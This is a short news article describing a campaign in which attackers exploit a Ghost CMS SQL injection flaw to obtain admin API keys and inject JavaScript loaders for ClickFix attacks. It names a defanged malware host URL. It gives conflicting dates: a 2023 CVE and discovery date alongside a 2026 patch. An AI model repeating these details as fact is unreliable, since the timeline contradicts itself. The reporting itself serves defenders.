Skip to content

Ghost CMS: Critical Security Vulnerability Compromises Over 700 Websites

Bottom line: Over 700 websites were compromised through a critical Ghost CMS security vulnerability. Attackers are injecting malicious JavaScript code for ClickFix attacks. The vulnerability CVE-2023-26980 enables unauthorized access to admin API keys. A patch has been available since February 2026.

Cybercriminals are exploiting a critical security vulnerability in Ghost CMS to compromise over 700 websites and hijack them for fraudulent ClickFix attacks. The vulnerability CVE-2023-26980 allows attackers to access admin API keys without authentication and manipulate content.

Security researchers from QiAnXin XLab have documented a large-scale campaign in which attackers exploit the critical security vulnerability CVE-2023-26980 in Ghost CMS. The SQL injection vulnerability with a CVSS score of 9.4 was already patched in February 2026 with version 6.19.1, but the damage is substantial.

The attack works in multiple steps: attackers exploit the vulnerability in the Content API to access admin API keys without authentication. Using these keys, they can abuse the Ghost Admin API to manipulate articles in bulk and inject malicious JavaScript code.

The injected code at the end of articles functions as a two-stage loader that downloads additional malware from external servers (such as “clo4shara[.]xyz/11z77u3.php”) at runtime. This flexible system allows criminals to swap payloads depending on the target, while the loader component remains unchanged.

At least two different attacker groups are responsible for the campaign, sometimes compromising websites on the same day they are discovered. The discovery was made on May 7, 2023. The targets span various industries: universities, blockchain projects, artificial intelligence, SaaS platforms, security research institutions, media, and fintech companies.

These compromises of legitimate websites significantly increase the effectiveness of ClickFix attacks, as users encounter the fraudulent code on what appear to be trustworthy sites.

Share on: